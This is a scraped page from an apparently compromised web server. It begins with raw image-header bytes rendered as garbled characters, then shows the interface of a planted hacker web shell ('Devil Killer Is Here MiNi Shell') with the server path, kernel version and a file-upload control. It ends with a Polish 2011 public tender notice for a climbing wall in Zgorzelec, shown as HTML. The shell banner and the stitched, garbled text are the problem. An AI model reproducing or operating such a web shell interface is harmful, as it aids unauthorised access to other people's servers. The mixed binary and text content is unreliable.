JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111118/385314-N-2011.html

<p class="kh_header"><b>Zgorzelec: Centrum sportów ekstremalnych w Zgorzelcu - dostawa i montaż ścianki wspinaczkowej</b><br>
<b>Numer ogłoszenia: 385314 - 2011; data zamieszczenia: 18.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Centrum sportów ekstremalnych w Zgorzelcu - dostawa i montaż ścianki wspinaczkowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zaprojektowanie oraz dostawa i montaż ścianki (wieży)
    wspinaczkowej do treningu i rekreacji o powierzchni min 152 m2 . 
    Ściankę wspinaczkową należy zainstalować na terenie Centrum Sportowo-Rekreacyjnym 
    w Zgorzelcu przy ul. Maratońskiej 2 - działka o numerze ewidencyjnym 29/1 Obręb VI, AM - 5. 
    Teren Stadionu Miejskiego posiada aktualny Miejscowy Plan Zagospodarowania 
    Przestrzennego obszaru śródmieście w Zgorzelcu uchwalony uchwałą nr 310/09  Rady 
    Miasta Zgorzelec z dnia 07.10.2009r. opublikowaną w Dzienniku Urzędowym z dnia 
    07.12.2009r. nr 210 poz. 38882. 

2. Przedmiot zamówienia obejmuje: 
    1) wykonanie dokumentacji projektowej ścianki (wieży) wspinaczkowej  w skład której 
        wchodzi:    
        a) koncepcja architektoniczna - 2 egz., 
        b) projekt budowlany - 4 egz., w skali 1:50 w zakresie rzutów, przekrojów, 
            skoordynowany we wszystkich branżach, zawierający wszelkie szczegóły                    
            rozwiązań konstrukcyjnych, technologicznych, zestawienia materiałów, rysunki                   
            detali, w skład którego wchodzą: 
            - projekt zagospodarowania terenu zawierający część opisową oraz część 
              rysunkową sporządzoną na kopii aktualnej mapy zasadniczej lub mapy 
              jednostkowej, przyjętej do państwowego zasobu geodezyjnego
              i kartograficznego, w skali dostosowanej do rodzaju i wielkości obiektu lub 
              zamierzenia budowlanego i zapewniającej jego czytelność, nie mniejszej niż 
              1:500  - 4 egz., 
            - przekroje poprzeczne charakterystyczne konstrukcyjne w skali 1:50, 
        c) projekt wykonawczy ze stopniem szczegółowości umożliwiającym prawidłowo 
            zrealizować roboty budowlane, zawierający szczegóły detali architektonicznych, 
            określający parametry i typy wybranych materiałów i urządzeń z podaniem 
            gabarytów urządzeń - 4 egz., 
        d) Specyfikacja Techniczna Ogólna i Szczegółowa Wykonania i Odbioru Robót, 
            zawierająca zbiory wymagań niezbędnych do określenia standardu i jakości 
            wykonania robót budowlanych, właściwości zastosowanych wyrobów 
            budowlanych oraz sposobu oceny prawidłowości wykonania robót budowlanych - 
            3 egz., 
        e) przedmiar robót - 3 egz. 

    2) uzyskanie w imieniu Zamawiającego ostatecznego pozwolenia na budowę, 

    3) wykonanie dokumentacji powykonawczej i uzyskanie ostatecznej decyzji 
         pozwolenia na użytkowanie obiektu,     
    4) zgłoszenie rozpoczęcia robót budowlanych, 
    
    5) wykonanie konstrukcji oraz przygotowanie paneli ściany, 
    
    6) dostawę i montaż wyposażenia ściany, 
    
    7) przeprowadzenie prób wytrzymałościowych zgodnie z obowiązującymi normami, 

    8) dostawę i montaż wyposażenia ściany wspinaczkowej: liny, uprzęże, przyrządy
        asekuracyjne,
    9) zapewnienie serwisu i obowiązkowych przeglądów w okresie gwarancji, 

  10) przeszkolenie 4 osób wskazanych przez Zamawiającego w zakresie obsługi ścianki 
        wspinaczkowej, wraz z wydaniem zaświadczenia o uzyskaniu kwalifikacji 
        umożliwiających obsługę ściany, i nadaniem tytułu Operator Ściany Wspinaczkowej, 

  11) przygotowanie i zamontowanie (w miejscu montażu ściany wspinaczkowej) 
        Instrukcji Obsługi i Regulaminu korzystania z przedmiotu zamówienia, sporządzonej 
        w języku polskim. 

3. Istotne postanowienia dotyczące dokumentacji projektowej, wymagane przez 
    Zamawiajacego:

    1) Koncepcja powinna zawierać informację o podstawowych parametrach  
        technicznych, rozwiązaniach funkcjonalnych i wizualnych, materiałach 
        proponowanych do zastosowania, 

    2) Dokumentacja projektowa musi spełniać wymogi obowiązujących przepisów, norm
        i  zasad wiedzy technicznej a w szczególności:
        a) Ustawy z dnia 07 lipca 1994r. Prawo budowlane (tekst jednolity z 2010r. Dz.U. Nr 
            243 poz. 1623 z późn.zm.), 
        b) Rozporządzenia Ministra Infrastruktury z dnia 03 lipca 2003r. w sprawie 
            szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003r. Nr 120, 
            poz. 1133 z późn.zm.), 
        c) Rozporządzenia Ministra Infrastruktury z dnia 02 września 2004r. w sprawie 
            szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji 
            technicznych wykonania i odbioru robót budowlanych oraz programu 
            funkcjonalno-użytkowego (Dz.U. z 2004r. Nr 202, poz. 2072 z późn.zm.), 
        d) Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie 
            warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie
            (Dz.U. Nr 75, poz.690 z późn.zm.)
        e) Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie 
            informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu 
            bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120, poz. 1126), 
 
    3) Wykonawca zapewni wykonanie dokumentacji z należytą starannością i zakresie
         niezbędnym do osiągnięcia celu, któremu one służą, z uwzględnieniem aktualnych
         przepisów, obowiązujących norm i zasad wiedzy technicznej. 

    4) Wykonawca w trakcie wykonywania przedmiotu umowy zobowiązany jest wykonać 
        opracowania i analizy oraz związane z nimi uzgodnienia nie wymienione w 
        Programie Funkcjonalno-Użytkowym, a wynikające z wymagań właściwych urzędów 
        lub właściwych jednostek.

    5) Wykonawca zobowiązany jest złożyć oświadczenie, że dokumentacja jest wykonana 
        zgodnie z Umową, przepisami techniczno-budowlanymi i normami oraz jest 
        kompletna z punktu widzenia celu, któremu ma służyć. 

    6) Wykonawca zobowiązany jest na każdym etapie opracowywania dokumentacji, o 
        której mowa w Programie Funkcjonalno-Użytkowym do konsultacji z Zamawiającym
        w szczególności, w przypadku pojawienia się czynników mających istotny wpływ na 
        koszt przyszłej inwestycji tj. rozwiązań funkcjonalno - użytkowych,             
        architektonicznych, konstrukcyjnych, materiałowych itp. 

    7) W przypadku wystąpienia na etapie projektowania kolizji z urządzeniami 
        podziemnymi Wykonawca zobowiązany jest zapewnić odpowiedni potencjał 
        kadrowy, tj. Projektantów odpowiednich branż w celu rozwiązania zaistniałej kolizji. 

    8) Przed rozpoczęciem prac projektowych, Wykonawca winien dokonać wizji lokalnej 
        terenu, objętego robotą budowlaną, celem zapoznania się z warunkami realizacji 
        przedmiotu zamówienia.  Wizję lokalną Wykonawca dokona na koszt własny. 

    9) Zobowiązuje się Wykonawcę, aby  w ramach  umowy pełnił funkcję nadzoru 
        autorskiego w zakresie: 
        a) stwierdzenia w toku wykonywania robót budowlanych zgodności ich realizacji
            z projektem, 
        b) uzgodnienia możliwości wprowadzenia rozwiązań zamiennych w stosunku do 
            przewidzianych w projekcie, zgłoszonych przez Kierownika Budowy lub 
            Inspektora Nadzoru Inwestorskiego, uzupełnienia projektu w rozwiązania robocze 
            oraz wyjaśnienia Wykonawcy robót, wątpliwości powstałych w toku realizacji 
            robot.

   10)Wykonawca poza wersją papierową dostarczy Zamawiającemu kompletną 
        dokumentację, zarchiwizowaną na płytach CD/DVD. Elementy dokumentacji 
        powinny być zapisane w poszczególnych plikach na formacie PDF. Nazwa pliku 
        powinna  odzwierciedlać temat opracowania. W wersji elektronicznej powinien być 
        również zamieszczony plik tekstowy o nazwie SPIS zawierający listę plików wraz z 
        pełnymi tytułami opracowań dokumentacji projektowej. 

   11)Wykonawca projektu odpowiada za zgodność projektu w wersji papierowej z wersją 
        elektroniczną. 

   12)Wszystkie opracowania Wykonawca wykona na koszt własny. 

   13)Wykonawca jest odpowiedzialny względem Zamawiajacego jeżeli dokumentacja 
        projektowa ma wady, zmieniające jej wartość lub użyteczność ze względu na cel 
        oznaczony w umowie, a w szczególności odpowiada za rozwiązania niezgodne
        z parametrami ustalonymi w normach i przepisach techniczno-budowlanych. 




 4. Szczegółowy opis przedmiotu zamówienia wraz z wymaganiami Zamawiającego, został 
     opisany w Programie Funkcjonalno-Użytkowym stanowiącym załącznik nr 8 do SIWZ. 

 5. Zamawiający wymaga 36 miesięcznego okresu gwarancji i rękojmi na wykonane roboty 
     budowlane  i zastosowane przy realizacji zamówienia materiały budowlane. 
     W dniu podpisania bezusterkowego protokołu odbioru robót, Wykonawca          
     potwierdzi  Zamawiającemu udzielenie gwarancji jakości  na wykonany  przedmiot 
     umowy  i zastosowane do realizacji zamówienia  materiały wraz z podaniem terminu 
     upływu gwarancji. 
     Jeżeli producent udzieli dłuższej gwarancji na materiały zastosowane do wykonania 
     przedmiotu zamówienia, obowiązywać będzie  gwarancja producenta.

 6. W ramach udzielonej gwarancji Wykonawca zobowiązany będzie do przeprowadzania  
     w  każdym roku kalendarzowym, przeglądów  gwarancyjnych a także  przeglądu 
     pogwarancyjnego; przy czym Zamawiający wymaga by  pierwszy przegląd gwarancyjny 
     nastąpił po upływie 6 miesięcy od dnia podpisania odbioru końcowego robót. 

 7. Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt 22 ustawy o 
     odpadach, ma obowiązek zagospodarowania odpadów powstałych podczas realizacji 
     zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. (tekst jednolity z 
     2010r. Dz. U. Nr 185, poz. 1243 z późn. zm.)  i ustawą Prawo ochrony środowiska  z 
     dnia  27 kwietnia 2001r. (tekst jednolity z 2008r. Dz. U. Nr 25, poz.150 z późn.zm.). 
 
 8. Wykonawca przedstawi Zamawiającemu potwierdzenie zagospodarowania odpadów
     zgodnie z powszechnie obowiązującymi przepisami, w terminie wskazanym w umowie. 

 9. Wykonawca wykona przedmiot umowy z materiałów własnych, które powinny 
     odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania 
     w  budownictwie zgodnie z  art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst 
     jednolity z 2010r. Dz. U. Nr 243, poz. 1623 z późn.zm.). 
                
10. Przedmiot zamówienia współfinansowany przez Unię Europejską ze środków    
      Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu 
      Operacyjnego Współpracy Transgranicznej Polska-Saksonia 2007-2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane polegające na powtórzeniu tego samego rodzaju zamówień, stanowiące nie
więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.91-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości  5 249,00 zł. 
    PLN (słownie: pięć tysięcy dwieście czterdzieści dziewięć zł.)

2. Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert. 
    Wadium musi być na koncie Zamawiającego przed upływem terminu składania 
    ofert.  

3. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na 
    przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 
    ustawy Pzp, albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie 
    wykluczony z postępowania o udzielenie zamówienia, a oferta Wykonawcy 
    wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 4 ustawy Pzp.
4. W zależności od woli wykonawcy wadium może być wnoszone w następujących  
    formach:
1)	pieniądzu,
        2)   poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
              kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
        3)   gwarancjach bankowych,
        4)   gwarancjach ubezpieczeniowych,
        5)   poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
              ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
              Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z późn.zm.).





UWAGA!

Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli  Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 ust. 1, lub pełnomocnictw.  

5. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego 
    wniesienie wadium do Zamawiającego.

6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I
    O/Zgorzelec.

    Na przelewie należy  umieścić informację :
    Wadium na Centrum sportów ekstremalnych w Zgorzelcu - dostawa i montaż ścianki 
    wspinaczkowej 

7.  Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, 
     którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 24.13 
     SIWZ. 

8.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
     zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego 
     oraz wniesieniu zabezpieczenia należytego wykonania umowy.  

9.  Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał 
     ofertę przed  upływem terminu składania ofert. 

10. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu
      zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku 
      ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako 
      najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez 
      Zamawiającego. 

11. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
      wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
      pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
      za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .

12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
      oferta  została wybrana :
      a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
          określonych w ofercie, 
      b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
      c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
          przyczyn   leżących  po stronie wykonawcy.



13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
      odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
      dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, chyba 
      że udowodni, ze wynika to z przyczyn należących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał (zakończył) jako Wykonawca lub Podwykonawca: 
- trzy  roboty budowlane polegające na wykonaniu ścian wspinaczkowych zewnętrznych, 
  wolnostojących, posadowionych na fundamencie o łącznej wartości brutto 200 000,00 zł. 
                
Ocena spełnienia powyższego warunku dokonana zostanie w oparciu o analizę                                                               przedłożonych przez Wykonawcę dokumentów i oświadczeń,  z treści których wynikać będą informacje potwierdzające spełnienie w/w warunku.     
Nie wykazanie w wystarczający sposób potwierdzenia spełnia powyższego warunku              spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności             określonych w art. 26 ust. 3 ustawy Prawo zamówień publicznych.  

Zamawiający informuje, iż w przypadku gdy Wykonawca przedstawi  w wykazie robót, 
kwoty wyrażone w innej walucie niż PLN, Zamawiający do oceny spełniania warunku  
przyjmie średni kurs tej waluty w stosunku do PLN publikowany przez NBP z dnia 
publikacji ogłoszenia o niniejszym zamówieniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż: 
a) dysponuje minimum 1 osobą, która będzie pełnić funkcję Kierownika Budowy,
     posiadającą   uprawnienia budowlane w specjalności konstrukcyjno-
     budowlanej bez ograniczeń,  wraz z informacją Wykonawcy o podstawie do 
           dysponowania tą osobą, 
   
b) dysponuje minimum 1 osobą, która będzie pełnić funkcję Projektanta,  
     posiadającą   uprawnienia budowlane do projektowania w specjalności  
     konstrukcyjno-budowlanej bez ograniczeń.  
          
 Ocena spełnienia powyższego warunku dokonana zostanie w oparciu o analizę                                                              przedłożonych przez Wykonawcę dokumentów i oświadczeń,  z treści których wynikać            będą informacje potwierdzające spełnienie w/w warunku.     
Nie wykazanie w wystarczający sposób potwierdzenia spełnia powyższego warunku             spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności            określonych w art. 26 ust. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem odrzucenia oferty zgodnie z art. 89 ust. 1  pkt. 2, z zastrzeżeniem art. 87 ust. 2 pkt.3 ustawy Prawo zamówień publicznych. 

1)  wypełniony i podpisany formularz Oferta - Załącznik nr 1 do SIWZ,        
2)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
     zamówień   publicznych - załącznik nr 2 do SIWZ.
     Powyższe oświadczenie, Wykonawca składa w przypadku gdy  zamierza 
     powierzyć do wykonania  części zamówienia.  
     W przypadku nie dołączenia do oferty powyższego formularza, bądź jego nie 
     wypełnienia Zamawiający uzna, iż Wykonawca wykona zamówienie własnymi  
     siłami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
